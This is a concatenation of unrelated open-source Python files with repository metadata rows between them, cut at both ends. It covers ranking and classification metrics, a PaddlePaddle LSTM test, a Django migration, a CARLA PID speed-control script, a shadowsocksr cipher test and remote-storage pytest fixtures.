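    return ndcg_score(y_true, good_scores, k=2), ndcg_score(y_true, bad_scores, k=2)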
# Alternative API.
def dcg_from_ranking(y_true, ranking):
"""Discounted cumulative gain (DCG) at rank k
Parameters
----------
y_true : array-like, shape = [n_samples]
Ground truth (true relevance labels).
ranking : array-like, shape = [k]
Document indices, i.e.,
ranking[0] is the index of top-ranked document,
ranking[1] is the index of second-ranked document,
...
k : int
Rank.
Returns
-------
DCG @k : float
"""
y_true = np.asarray(y_true)
ranking = np.asarray(ranking)
rel = y_true[ranking]
gains = 2 ** rel - 1
discounts = np.log2(np.arange(len(ranking)) + 2)
return np.sum(gains / discounts)
def ndcg_from_ranking(y_true, ranking):
"""Normalized discounted cumulative gain (NDCG) at rank k
Parameters
----------
y_true : array-like, shape = [n_samples]
Ground truth (true relevance labels).
ranking : array-like, shape = [k]
Document indices, i.e.,
ranking[0] is the index of top-ranked document,
ranking[1] is the index of second-ranked document,
...
k : int
Rank.
Returns
-------
NDCG @k : float
"""
k = len(ranking)
best_ranking = np.argsort(y_true)[::-1]
best = dcg_from_ranking(y_true, best_ranking[:k])
return dcg_from_ranking(y_true, ranking) / best
def colwise_accuracy(y_true,y_pred):
y_pred=y_pred.T
y_true=y_true.T
acc_list=[]
for cate in range(0,y_pred.shape[0]):
acc_list.append(accuracy_score(y_pred[cate],y_true[cate]))
return sum(acc_list)/len(acc_list)
def calculate_metrics(pred, target, threshold=0.5):
pred = np.array(pred > threshold, dtype=float)
return {'Accuracy': accuracy_score(y_true=target, y_pred=pred),
'Column-wise Accuracy': colwise_accuracy(y_true=target, y_pred=pred),
'micro/precision': precision_score(y_true=target, y_pred=pred, average='micro'),
'micro/recall': recall_score(y_true=target, y_pred=pred, average='micro'),
'micro/f1': f1_score(y_true=target, y_pred=pred, average='micro'),
'macro/precision': precision_score(y_true=target, y_pred=pred, average='macro'),
'macro/recall': recall_score(y_true=target, y_pred=pred, average='macro'),
'macro/f1': f1_score(y_true=target, y_pred=pred, average='macro'),
'samples/precision': precision_score(y_true=target, y_pred=pred, average='samples'),
'samples/recall': recall_score(y_true=target, y_pred=pred, average='samples'),
'samples/f1': f1_score(y_true=target, y_pred=pred, average='samples'),
} | 28.360434 | 96 | 0.602389 | [
"Apache-2.0"
] | myeonghak/kobert-multi-label-VOC-classifier | voc_classifier/metrics_for_multilabel.py | 10,465 | Python |
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import, division, print_function
import logging
import time
import unittest
import numpy as np
import paddle.fluid as fluid
from paddle.fluid.dygraph.dygraph_to_static import ProgramTranslator
from paddle.fluid.dygraph.base import to_variable
from paddle.fluid.dygraph.jit import declarative
from paddle.fluid.dygraph.nn import Embedding
from paddle.fluid.optimizer import SGDOptimizer
PRINT_STEP = 20
SEED = 2020
program_translator = ProgramTranslator()
class SimpleLSTMRNN(fluid.Layer):
def __init__(self,
hidden_size,
num_steps,
num_layers=2,
init_scale=0.1,
dropout=None):
super(SimpleLSTMRNN, self).__init__()
self._hidden_size = hidden_size
self._num_layers = num_layers
self._init_scale = init_scale
self._dropout = dropout
self._num_steps = num_steps
self.cell_array = []
self.hidden_array = []
self.weight_1_arr = []
self.weight_2_arr = []
self.bias_arr = []
self.mask_array = []
for i in range(self._num_layers):
weight_1 = self.create_parameter(
attr=fluid.ParamAttr(
initializer=fluid.initializer.UniformInitializer(
low=-self._init_scale, high=self._init_scale)),
shape=[self._hidden_size * 2, self._hidden_size * 4],
dtype="float32",
default_initializer=fluid.initializer.UniformInitializer(
low=-self._init_scale, high=self._init_scale))
self.weight_1_arr.append(self.add_parameter('w_%d' % i, weight_1))
bias_1 = self.create_parameter(
attr=fluid.ParamAttr(
initializer=fluid.initializer.UniformInitializer(
low=-self._init_scale, high=self._init_scale)),
shape=[self._hidden_size * 4],
dtype="float32",
default_initializer=fluid.initializer.Constant(0.0))
self.bias_arr.append(self.add_parameter('b_%d' % i, bias_1))
def forward(self, input_embedding, init_hidden=None, init_cell=None):
cell_array = []
hidden_array = []
for i in range(self._num_layers):
hidden_array.append(init_hidden[i])
cell_array.append(init_cell[i])
res = []
for index in range(self._num_steps):
step_input = input_embedding[:, index, :]
for k in range(self._num_layers):
pre_hidden = hidden_array[k]
pre_cell = cell_array[k]
weight_1 = self.weight_1_arr[k]
bias = self.bias_arr[k]
nn = fluid.layers.concat([step_input, pre_hidden], 1)
gate_input = fluid.layers.matmul(x=nn, y=weight_1)
gate_input = fluid.layers.elementwise_add(gate_input, bias)
i, j, f, o = fluid.layers.split(
gate_input, num_or_sections=4, dim=-1)
c = pre_cell * fluid.layers.sigmoid(f) + fluid.layers.sigmoid(
i) * fluid.layers.tanh(j)
m = fluid.layers.tanh(c) * fluid.layers.sigmoid(o)
hidden_array[k] = m
cell_array[k] = c
step_input = m
if self._dropout is not None and self._dropout > 0.0:
step_input = fluid.layers.dropout(
step_input,
dropout_prob=self._dropout,
dropout_implementation='upscale_in_train')
res.append(step_input)
real_res = fluid.layers.concat(res, 1)
real_res = fluid.layers.reshape(
real_res, [-1, self._num_steps, self._hidden_size])
last_hidden = fluid.layers.concat(hidden_array, 1)
last_hidden = fluid.layers.reshape(
last_hidden, shape=[-1, self._num_layers, self._hidden_size])
last_hidden = fluid.layers.transpose(x=last_hidden, perm=[1, 0, 2])
last_cell = fluid.layers.concat(cell_array, 1)
last_cell = fluid.layers.reshape(
last_cell, shape=[-1, self._num_layers, self._hidden_size])
last_cell = fluid.layers.transpose(x=last_cell, perm=[1, 0, 2])
return real_res, last_hidden, last_cell
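# --- Editor's note (added for clarity; not part of the original file): the
# four-way split of gate_input in the loop above corresponds to the standard
# LSTM cell equations, with i, j, f, o playing the roles of input gate,
# candidate cell state, forget gate and output gate respectively:
#
#     c_t = c_{t-1} * sigmoid(f) + sigmoid(i) * tanh(j)
#     h_t = tanh(c_t) * sigmoid(o)
#
# so each layer keeps (h_t, c_t) in hidden_array / cell_array between steps.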
class PtbModel(fluid.Layer):
def __init__(self,
hidden_size,
vocab_size,
num_layers=2,
num_steps=20,
init_scale=0.1,
dropout=None):
super(PtbModel, self).__init__()
self.hidden_size = hidden_size
self.vocab_size = vocab_size
self.init_scale = init_scale
self.num_layers = num_layers
self.num_steps = num_steps
self.dropout = dropout
self.simple_lstm_rnn = SimpleLSTMRNN(
hidden_size,
num_steps,
num_layers=num_layers,
init_scale=init_scale,
dropout=dropout)
self.embedding = Embedding(
size=[vocab_size, hidden_size],
dtype='float32',
is_sparse=False,
param_attr=fluid.ParamAttr(
name='embedding_para',
initializer=fluid.initializer.UniformInitializer(
low=-init_scale, high=init_scale)))
self.softmax_weight = self.create_parameter(
attr=fluid.ParamAttr(),
shape=[self.hidden_size, self.vocab_size],
dtype="float32",
default_initializer=fluid.initializer.UniformInitializer(
low=-self.init_scale, high=self.init_scale))
self.softmax_bias = self.create_parameter(
attr=fluid.ParamAttr(),
shape=[self.vocab_size],
dtype="float32",
default_initializer=fluid.initializer.UniformInitializer(
low=-self.init_scale, high=self.init_scale))
def build_once(self, input, label, init_hidden, init_cell):
pass
@declarative
def forward(self, input, label, init_hidden, init_cell):
init_h = fluid.layers.reshape(
init_hidden, shape=[self.num_layers, -1, self.hidden_size])
init_c = fluid.layers.reshape(
init_cell, shape=[self.num_layers, -1, self.hidden_size])
x_emb = self.embedding(input)
x_emb = fluid.layers.reshape(
x_emb, shape=[-1, self.num_steps, self.hidden_size])
if self.dropout is not None and self.dropout > 0.0:
x_emb = fluid.layers.dropout(
x_emb,
dropout_prob=self.dropout,
dropout_implementation='upscale_in_train')
rnn_out, last_hidden, last_cell = self.simple_lstm_rnn(x_emb, init_h,
init_c)
projection = fluid.layers.matmul(rnn_out, self.softmax_weight)
projection = fluid.layers.elementwise_add(projection, self.softmax_bias)
loss = fluid.layers.softmax_with_cross_entropy(
logits=projection, label=label, soft_label=False)
loss = fluid.layers.reshape(loss, shape=[-1, self.num_steps])
loss = fluid.layers.reduce_mean(loss, dim=[0])
loss = fluid.layers.reduce_sum(loss)
return loss, last_hidden, last_cell
def debug_emb(self):
np.save("emb_grad", self.x_emb.gradient())
def train(place):
num_layers = 1
batch_size = 4
hidden_size = 10
num_steps = 3
init_scale = 0.1
max_epoch = 1
dropout = 0.0
vocab_size = 1000
batch_num = 200
with fluid.dygraph.guard(place):
fluid.default_startup_program().random_seed = SEED
fluid.default_main_program().random_seed = SEED
ptb_model = PtbModel(
hidden_size=hidden_size,
vocab_size=vocab_size,
num_layers=num_layers,
num_steps=num_steps,
init_scale=init_scale,
dropout=dropout)
sgd = SGDOptimizer(
learning_rate=1e-3, parameter_list=ptb_model.parameters())
for epoch_id in range(max_epoch):
total_loss = 0.0
iters = 0.0
total_sample = 0
init_hidden_data = np.zeros(
(num_layers, batch_size, hidden_size), dtype='float32')
init_cell_data = np.zeros(
(num_layers, batch_size, hidden_size), dtype='float32')
init_hidden = to_variable(init_hidden_data)
init_cell = to_variable(init_cell_data)
for step_id in range(batch_num):
x_data = np.arange(12).reshape(4, 3).astype('int64')
y_data = np.arange(1, 13).reshape(4, 3).astype('int64')
y_data = y_data.reshape((-1, 1))
x_data = x_data.reshape((-1, num_steps, 1))
y_data = y_data.reshape((-1, num_steps, 1))
x = to_variable(x_data)
y = to_variable(y_data)
dy_loss, last_hidden, last_cell = ptb_model(x, y, init_hidden,
init_cell)
out_loss = dy_loss.numpy()
dy_loss.backward()
sgd.minimize(dy_loss)
ptb_model.clear_gradients()
total_loss += out_loss
iters += num_steps
total_sample += 1
if step_id % PRINT_STEP == 0:
if step_id == 0:
logging.info("epoch %d | step %d, loss %0.3f" % (
epoch_id, step_id, total_loss / total_sample))
avg_batch_time = time.time()
else:
speed = PRINT_STEP / (time.time() - avg_batch_time)
logging.info(
"epoch %d | step %d, loss %0.3f, speed %.3f steps/s"
% (epoch_id, step_id, total_loss / total_sample,
speed))
avg_batch_time = time.time()
return out_loss, last_hidden.numpy(), last_cell.numpy()
def train_dygraph(place):
program_translator.enable(False)
return train(place)
def train_static(place):
program_translator.enable(True)
return train(place)
class TestPtb(unittest.TestCase):
def setUp(self):
self.place = fluid.CUDAPlace(0) if fluid.is_compiled_with_cuda() \
else fluid.CPUPlace()
def test_check_result(self):
loss_1, hidden_1, cell_1 = train_static(self.place)
loss_2, hidden_2, cell_2 = train_dygraph(self.place)
self.assertTrue(
np.allclose(loss_1, loss_2),
msg="static loss: {} \ndygraph loss: {}".format(loss_1, loss_2))
self.assertTrue(
np.allclose(hidden_1, hidden_2),
msg="static hidden: {} \ndygraph acc1: {}".format(hidden_1,
hidden_2))
self.assertTrue(
np.allclose(cell_1, cell_2),
msg="static cell: {} \ndygraph cell: {}".format(cell_1, cell_2))
if __name__ == '__main__':
unittest.main()
| 37.301887 | 80 | 0.581858 | [
"Apache-2.0"
] | 92lqllearning/Paddle | python/paddle/fluid/tests/unittests/dygraph_to_static/test_ptb_lm.py | 11,862 | Python |
from tqdm import tqdm
import matplotlib.pyplot as plt
from matplotlib import rc
rc('font',**{'family':'serif','serif':['Palatino']})
rc('text', usetex=True)
rc('text.latex', preamble=r'''\usepackage{amsmath}
\usepackage{physics}
\usepackage{siunitx}
''')
rc('figure', dpi=150)
def plot_and_save(plotting_func):
plotting_func()
plt.savefig(str(plotting_func.__name__).split(sep='.')[0] + '.pdf', bbox_inches='tight', pad_inches = 0)
plt.close()
if __name__ == "__main__":
plotter_list = []
for plotting_func in tqdm(plotter_list):
plot_and_save(plotting_func) | 26.818182 | 108 | 0.69661 | [
"Apache-2.0"
] | jacopok/notes | phd_courses/theoretical_high_energy_astroparticle/figures/make_all_figures.py | 590 | Python |
# Generated by Django 3.2.9 on 2022-01-03 10:15
import cloudinary.models
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('neighbourhood', '0003_auto_20211222_2324'),
]
operations = [
migrations.CreateModel(
name='Location',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=20, null=True)),
('created_on', models.DateTimeField(auto_now_add=True, null=True)),
('updated_on', models.DateTimeField(auto_now=True, null=True)),
],
),
migrations.RemoveField(
model_name='profile',
name='name',
),
migrations.AddField(
model_name='neighbourhood',
name='description',
field=models.TextField(max_length=200, null=True),
),
migrations.AddField(
model_name='neighbourhood',
name='hood_image',
field=cloudinary.models.CloudinaryField(max_length=255, null=True, verbose_name='hood_image'),
),
migrations.AddField(
model_name='neighbourhood',
name='location',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='neighbourhood.location'),
),
migrations.AddField(
model_name='profile',
name='location',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='neighbourhood.location'),
),
]
| 34.857143 | 121 | 0.600117 | [
"MIT"
] | Maryan23/MyHood | neighbourhood/migrations/0004_auto_20220103_1315.py | 1,708 | Python |
import deepSI
from deepSI.systems.system import System_ss, System_data
import numpy as np
class NarendraLiBenchmark(System_ss): #https://arxiv.org/pdf/2003.14162.pdf
"""docstring for NarendraLiBenchmark"""
def __init__(self):
'''Noise, system setting and x0 settings'''
super(NarendraLiBenchmark, self).__init__(nx=2)
def f(self,x,u):
x1,x2 = x
x1new = (x1/(1+x1**2)+1)*np.sin(x2)
x2new = x2*np.cos(x2) + x1*np.exp(-(x1**2+x2**2)/8) + u**3/(1+u**2+0.5*np.cos(x1+x2))
return [x1new,x2new]
def h(self,x):
x1,x2 = x
return x1/(1+0.5*np.sin(x2)) + x2/(1+0.5*np.sin(x1)) + self.random.normal(scale=0.1)
def get_train_data(self):
exp = System_data(u=self.random.uniform(low=-2.5,high=2.5,size=(2000,)))
return self.apply_experiment(exp)
def get_test_data(self):
exp = System_data(u=self.random.uniform(low=-2.5,high=2.5,size=(2000,)))
return self.apply_experiment(exp)
if __name__ == '__main__':
from deepSI import fit_systems
sys = NarendraLiBenchmark()
sys_data = sys.get_train_data()
SYS = fit_systems.System_IO_fit_linear
# sys_fit, score, kwargs = fit_systems.fit_system_tuner(SYS, sys_data, dict(na=range(0,7),nb=range(1,7)))
score, sys_fit, kwargs, _ = fit_systems.grid_search(SYS, sys_data, dict(na=range(0,7),nb=range(1,7)))
sys_data_predict = sys_fit.apply_experiment(sys_data)
sys_data.plot()
sys_data_predict.plot(show=True)
| 37.35 | 109 | 0.655957 | [
"BSD-3-Clause"
] | csutakbalazs/deepSI | deepSI/systems/narendra_li_benchmark.py | 1,494 | Python |
from __future__ import absolute_import, division, print_function, \
with_statement
import sys
import os
sys.path.insert(0, os.path.join(os.path.dirname(__file__), '../'))
from shadowsocksr.crypto import rc4_md5
from shadowsocksr.crypto import openssl
from shadowsocksr.crypto import sodium
from shadowsocksr.crypto import table
def run(func):
try:
func()
except:
pass
def run_n(func, name):
try:
func(name)
except:
pass
def main():
print("\n""rc4_md5")
rc4_md5.test()
print("\n""aes-256-cfb")
openssl.test_aes_256_cfb()
print("\n""aes-128-cfb")
openssl.test_aes_128_cfb()
print("\n""bf-cfb")
run(openssl.test_bf_cfb)
print("\n""camellia-128-cfb")
run_n(openssl.run_method, "camellia-128-cfb")
print("\n""cast5-cfb")
run_n(openssl.run_method, "cast5-cfb")
print("\n""idea-cfb")
run_n(openssl.run_method, "idea-cfb")
print("\n""seed-cfb")
run_n(openssl.run_method, "seed-cfb")
print("\n""salsa20")
run(sodium.test_salsa20)
print("\n""chacha20")
run(sodium.test_chacha20)
if __name__ == '__main__':
main()
| 20.54902 | 67 | 0.714695 | [
"Apache-2.0"
] | hcaijin/ssrspeedtest | shadowsocksr/encrypt_test.py | 1,048 | Python |
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
# SPDX-License-Identifier: Apache-2.0
"""
Purpose
Shows how to implement an AWS Lambda function that publishes messages to an
AWS IoT Greengrass connector.
"""
# snippet-start:[greengrass.python.connector-modbus-rtu-usage.complete]
import json
import greengrasssdk
iot_client = greengrasssdk.client('iot-data')
send_topic = 'modbus/adapter/request'
def create_read_coils_request():
return {
"request": {
"operation": "ReadCoilsRequest",
"device": 1,
"address": 0x01,
"count": 1},
"id": "TestRequest"}
def publish_basic_message():
iot_client.publish(
topic=send_topic, payload=json.dumps(create_read_coils_request()))
publish_basic_message()
# In this example, the required AWS Lambda handler is never called.
def function_handler(event, context):
return
# snippet-end:[greengrass.python.connector-modbus-rtu-usage.complete]
| 24.121951 | 75 | 0.706775 | [
"Apache-2.0"
] | 1n5an1ty/aws-doc-sdk-examples | python/example_code/greengrass/snippets/connector_modbus_rtu_usage.py | 989 | Python |
import constraint
coins = [1, 2, 5, 10, 20, 50, 100, 200]
CSP = constraint.Problem()
for coin in coins:
CSP.addVariable(coin, range(0, 201, coin))
CSP.addConstraint(constraint.ExactSumConstraint(200))
print len(CSP.getSolutions()) | 26.222222 | 53 | 0.724576 | [
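# --- Editor's addition (not part of the original solution): the same count can
# be cross-checked without the constraint library via the classic coin-change
# dynamic programme; a minimal sketch:
def count_combinations(total=200, denominations=(1, 2, 5, 10, 20, 50, 100, 200)):
    ways = [1] + [0] * total  # ways[v] = number of combinations summing to v
    for coin in denominations:
        for value in range(coin, total + 1):
            ways[value] += ways[value - coin]
    return ways[total]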
"MIT"
] | rik0/rk-exempla | some-euler/p31.py | 236 | Python |
#!/usr/bin/env python
# file trying to apply and test the pid controller on carla.
import glob
import os
import sys
import time
import matplotlib.pyplot as plt
from PID_controller import PID
import numpy as np
import speed_profile_reader as spr
try:
sys.path.append(glob.glob('../**/*%d.%d-%s.egg' % (
sys.version_info.major,
sys.version_info.minor,
'win-amd64' if os.name == 'nt' else 'linux-x86_64'))[0])
except IndexError:
pass
import carla
import random
import time
class TestData:
def __init__(self, total_duration, time_increment):
self._iter_num = 0
self.time = np.empty([int(total_duration / time_increment) + 1, 1])
self.setpoint = np.empty([int(total_duration / time_increment) + 1, 1])
self.actual_velocity = np.empty([int(total_duration / time_increment) + 1, 1])
self.error = np.empty([int(total_duration / time_increment) + 1, 1])
def append_data(self, t, sp, vel, error):
self.time[self._iter_num] = t
self.setpoint[self._iter_num] = sp
self.actual_velocity[self._iter_num] = vel
self.error[self._iter_num] = error
self._iter_num+=1
def plot(self):
plt.figure()
plt.plot(self.time, self.setpoint)
plt.plot(self.time, self.actual_velocity)
plt.xlabel('Time (s)')
plt.ylabel('Velocity (m/s)')
plt.title("PID Result")
plt.figure()
plt.plot(self.time, self.error, 'r--', label='error', alpha=0.75, linewidth=0.5)
plt.plot(self.time, np.zeros(len(self.time)), 'k--', linewidth=0.5)
plt.title("Controller Error")
plt.show()
class DataInit:
K = {
"Kp": 0.055734,
"Ki": 0.0114169,
"Kd": .00006
# For 10 m/s
# "Kp": 0.055734,
# "Ki": 0.0130169,
# "Kd": .000006
# "Kp": 1,
# "Ki": 0.0112,
# "Kd": 0.000006
}
total_duration = 20
sampling_period = 0.025
def main():
actor_list = []
verboseIsEnabled = None
try:
"""
Section for starting the client and connecting to the server
"""
client = carla.Client('localhost', 2000)
client.set_timeout(2.0)
for arg in sys.argv:
if (arg == '--verbose'):
verboseIsEnabled = True
if verboseIsEnabled:
print('client version: %s' % client.get_client_version())
print('server version: %s' % client.get_server_version())
print('client to server connection status: {}'.format(client.get_server_version()))
print('Retrieving the world data from server...')
world = client.get_world()
if verboseIsEnabled:
print('{} \n'.format(world))
"""
Section for retrieving the blueprints and spawn the actors
"""
blueprint_library = world.get_blueprint_library()
if verboseIsEnabled:
print('\nRetrieving CARLA blueprint library...')
print('\nobject: %s\n\nblueprint methods: %s\n\nblueprint list:' % (type(blueprint_library), dir(blueprint_library)) )
for blueprint in blueprint_library:
print(blueprint)
audi_blueprint = blueprint_library.find('vehicle.audi.tt')
print('\n%s\n' % audi_blueprint)
color = '191,191,191'
audi_blueprint.set_attribute('color', color)
transform = carla.Transform(
carla.Location(
x=10.5, y=-1.8,
z=38.5),carla.Rotation(yaw=0.0)
)
vehicleEgo = world.spawn_actor(audi_blueprint, transform)
actor_list.append(vehicleEgo)
print('created %s' % vehicleEgo.type_id)
color = random.choice(audi_blueprint.get_attribute('color').recommended_values)
audi_blueprint.set_attribute('color', color)
"""
Section for initializing the PID testing
"""
user_input_sp = None
while (not isinstance(user_input_sp, int)) and (not isinstance(user_input_sp, float)):
user_input_sp = input('Enter the desired Setpoint:\n')
data = TestData(DataInit.total_duration, DataInit.sampling_period)
start = time.time()
print('\nStarting test:\n\n' + 'Time(s) current_vel(m/s) setpoint_vel(m/s) throttle(%) pid_demand')
time.sleep(2.5)
print('.................................................................\n')
time.sleep(1)
# raise SystemExit
p = PID(
DataInit.K['Kp'],
DataInit.K['Ki'],
DataInit.K['Kd']
)
p.setPoint(user_input_sp)
p.Integrator_min = -5
p.Integrator_max = 40
pid = 0
for _ in range(int(DataInit.total_duration / DataInit.sampling_period) + 1):
measurement_value = vehicleEgo.get_velocity().x
vehicleEgo.apply_control(carla.VehicleControl(pid)) if 1 > pid > 0 else vehicleEgo.apply_control(carla.VehicleControl(1))
if 0 > pid: vehicleEgo.apply_control(carla.VehicleControl(brake=abs(pid)))
pid = p.update(measurement_value)
data.append_data(round(time.time() - start, 2), p.getSetPoint(), round(vehicleEgo.get_velocity().x, 5), p.getError())
time.sleep(DataInit.sampling_period)
print('%0.3f\t%0.2f\t\t\t%0.2f\t\t%0.2f\t%0.2f' % (time.time() - start,
vehicleEgo.get_velocity().x,
p.set_point,
vehicleEgo.get_control().throttle,
pid))
data.plot()
print('\nError Mean (Steady State):\n' +
str(round(np.absolute(np.mean(data.error[data.error.shape[0]/2:data.error.shape[0]])), 5)*100) +
'%\n')
finally:
print('destroying actors')
for actor in actor_list:
actor.destroy()
print('done.')
if __name__ == '__main__':
main()
| 33.593407 | 133 | 0.564279 | [
"MIT"
] | AbdulHoffmann/carla_carissma | PythonAPI/carissma_project/PID_apply_static_sp.py | 6,114 | Python |
{% if cookiecutter.use_celery == 'y' %}
from __future__ import absolute_import
import os
from celery import Celery
from django.apps import AppConfig
from django.conf import settings
if not settings.configured:
# set the default Django settings module for the 'celery' program.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'config.settings.local') # pragma: no cover
app = Celery('{{cookiecutter.project_slug}}')
class CeleryConfig(AppConfig):
name = '{{cookiecutter.project_slug}}.taskapp'
verbose_name = 'Celery Config'
def ready(self):
# Using a string here means the worker will not have to
# pickle the object when using Windows.
app.config_from_object('django.conf:settings')
app.autodiscover_tasks(lambda: settings.INSTALLED_APPS, force=True)
{% if cookiecutter.use_sentry_for_error_reporting == 'y' -%}
if hasattr(settings, 'RAVEN_CONFIG'):
# Celery signal registration
from raven import Client as RavenClient
from raven.contrib.celery import register_signal as raven_register_signal
from raven.contrib.celery import register_logger_signal as raven_register_logger_signal
raven_client = RavenClient(dsn=settings.RAVEN_CONFIG['DSN'])
raven_register_logger_signal(raven_client)
raven_register_signal(raven_client)
{%- endif %}
{% if cookiecutter.use_opbeat == 'y' -%}
if hasattr(settings, 'OPBEAT'):
from opbeat.contrib.django.models import client as opbeat_client
from opbeat.contrib.django.models import logger as opbeat_logger
from opbeat.contrib.django.models import register_handlers as opbeat_register_handlers
from opbeat.contrib.celery import register_signal as opbeat_register_signal
try:
opbeat_register_signal(opbeat_client)
except Exception as e:
opbeat_logger.exception('Failed installing celery hook: %s' % e)
if 'opbeat.contrib.django' in settings.INSTALLED_APPS:
opbeat_register_handlers()
{%- endif %}
@app.task(bind=True)
def debug_task(self):
print('Request: {0!r}'.format(self.request)) # pragma: no cover
{% else %}
# Use this as a starting point for your project with celery.
# If you are not using celery, you can remove this app
{% endif -%}
| 38.253968 | 99 | 0.688797 | [
"Apache-2.0"
] | andkon/botstarter | {{cookiecutter.project_slug}}/{{cookiecutter.project_slug}}/taskapp/celery.py | 2,410 | Python |
import logging
import os
from typing import Generator
import pytest
@pytest.fixture(scope="module", autouse=True)
def change_to_resources_dir(test_resources, request):
os.chdir(test_resources)
yield
os.chdir(request.config.invocation_dir)
@pytest.fixture()
def test_filename(
change_to_resources_dir, storage, request
) -> Generator[str, None, None]:
"""Pushes a file to remote storage, yields its filename and then deletes it from remote storage"""
filename = request.param
storage.push_file(filename)
yield filename
storage.delete(filename)
NAME_COLLISIONS_DIR_NAME = "storage_name_collisions"
@pytest.fixture()
def setup_name_collision(change_to_resources_dir, storage):
"""
Pushes files and dirs with colliding names to remote storage, yields files pushed
and deletes everything at cleanup
"""
pushed_objects = storage.push(NAME_COLLISIONS_DIR_NAME)
yield pushed_objects
storage.delete(NAME_COLLISIONS_DIR_NAME)
@pytest.fixture()
def test_dirname(
change_to_resources_dir, storage, request
) -> Generator[str, None, None]:
"""Pushes a directory to remote storage, yields its name and then deletes it from remote storage"""
dirname = request.param
storage.push_directory(dirname)
yield dirname
storage.delete(dirname)
def test_delete_no_matches(storage, caplog):
with caplog.at_level(logging.WARNING):
deleted_files = storage.delete("there is no such file")
assert len(deleted_files) == 0
assert "Not deleting anything" in caplog.text
def test_delete_file(storage):
storage.push_file("sample.txt", overwrite_existing=True)
assert len(storage.list_objects("sample.txt")) == 1
deleted_objects = storage.delete("sample.txt")
assert len(deleted_objects) == 1
assert len(storage.list_objects("sample.txt")) == 0
def test_delete_with_base_path(storage):
base_path = "base_path"
storage.set_remote_base_path(base_path)
storage.push_file("sample.txt", overwrite_existing=True)
assert len(storage.list_objects("sample.txt")) == 1
deleted_objects = storage.delete("sample.txt")
assert len(deleted_objects) == 1
assert deleted_objects[0].name == f"{base_path}/sample.txt"
def test_delete_dir(storage):
storage.push_directory("sample_dir", overwrite_existing=True)
assert len(storage.list_objects("sample_dir")) == 2
deleted_objects = storage.delete("sample_dir")
assert len(deleted_objects) == 2
assert len(storage.list_objects("sample_dir")) == 0
@pytest.mark.parametrize(
"test_filename",
["sample.txt"],
indirect=["test_filename"],
)
def test_push_file_empty_base_path(storage, test_filename):
remote_objects = storage.push(test_filename)
assert len(remote_objects) == 1
# we need lstrip because s3 paths (and names) start with "/" while google storage paths start without it...
assert remote_objects[0].name.lstrip("/") == test_filename
@pytest.mark.parametrize(
"test_filename",
["sample.txt"],
indirect=["test_filename"],
)
def test_push_file_nonempty_base_path(storage, test_filename):
base_path = "base_path"
storage.set_remote_base_path(base_path)
remote_objects = storage.push(test_filename)
assert len(remote_objects) == 1
assert remote_objects[0].name.lstrip("/") == f"{base_path}/{test_filename}"
@pytest.mark.parametrize(
"test_dirname",
["sample_dir"],
indirect=["test_dirname"],
)
def test_push_directory(storage, test_dirname):
remote_objects = storage.push(test_dirname)
assert len(remote_objects) == 2
assert len(storage.list_objects(test_dirname)) == 2
@pytest.mark.parametrize(
"file_or_dir_name", ["non_existing_file.txt", "non_existing_dir"]
)
def test_push_non_existing(storage, file_or_dir_name):
with pytest.raises(
FileNotFoundError, match="does not refer to a file or directory"
):
storage.push(file_or_dir_name)
@pytest.mark.parametrize(
"test_filename",
["sample.txt"],
indirect=["test_filename"],
)
def test_pull_file(storage, test_filename, tmpdir):
local_base_dir = tmpdir.mkdir("remote_storage")
storage.pull(test_filename, local_base_dir=local_base_dir)
assert os.path.isfile(os.path.join(local_base_dir, test_filename))
pulled_files = storage.pull(test_filename)
assert len(pulled_files) == 0
@pytest.mark.parametrize(
"test_filename",
["sample.txt"],
indirect=["test_filename"],
)
def test_pull_file_to_existing_dir_path(storage, test_filename, tmpdir):
local_base_dir = tmpdir.mkdir("remote_storage")
local_base_dir.mkdir(test_filename)
with pytest.raises(
FileExistsError,
match="Cannot pull file to a path which is an existing directory:",
):
storage.pull(test_filename, local_base_dir=local_base_dir)
@pytest.mark.parametrize(
"test_dirname",
["sample_dir"],
indirect=["test_dirname"],
)
def test_pull_dir(storage, test_dirname, tmpdir):
local_base_dir = tmpdir.mkdir("remote_storage")
storage.pull(test_dirname, local_base_dir=local_base_dir)
assert os.path.isdir(os.path.join(local_base_dir, test_dirname))
assert len(os.listdir(os.path.join(local_base_dir, test_dirname))) == 2
pulled_files = storage.pull(test_dirname)
assert len(pulled_files) == 0
@pytest.mark.parametrize(
"file_or_dir_name", ["non_existing_file.txt", "non_existing_dir"]
)
def test_pull_non_existing(storage, file_or_dir_name, caplog):
with caplog.at_level(logging.WARNING):
pulled_files = storage.pull(file_or_dir_name)
assert len(pulled_files) == 0
assert "No such remote file or directory" in caplog.text
def test_name_collisions_pulling_properly(setup_name_collision, storage, tmpdir):
storage.set_remote_base_path(NAME_COLLISIONS_DIR_NAME)
local_base_dir = tmpdir.mkdir("remote_storage")
colliding_file_name = "file.txt.collision"
colliding_dir_name = "dir_name_collision"
storage.pull("file.txt", local_base_dir=local_base_dir)
storage.pull("dir_name", local_base_dir=local_base_dir)
assert not os.path.isfile(os.path.join(local_base_dir, colliding_file_name))
assert os.path.isfile(os.path.join(local_base_dir, "file.txt"))
assert not os.path.isdir(os.path.join(local_base_dir, colliding_dir_name))
assert os.path.isdir(os.path.join(local_base_dir, "dir_name"))
storage.pull(colliding_file_name, local_base_dir=local_base_dir)
assert os.path.isfile(os.path.join(local_base_dir, colliding_file_name))
storage.pull(colliding_dir_name, local_base_dir=local_base_dir)
assert os.path.isfile(os.path.join(local_base_dir, colliding_dir_name, "file.txt"))
def test_name_collisions_deleting_properly(setup_name_collision, storage):
storage.set_remote_base_path(NAME_COLLISIONS_DIR_NAME)
storage.delete("file.txt")
remaining_object_names = [
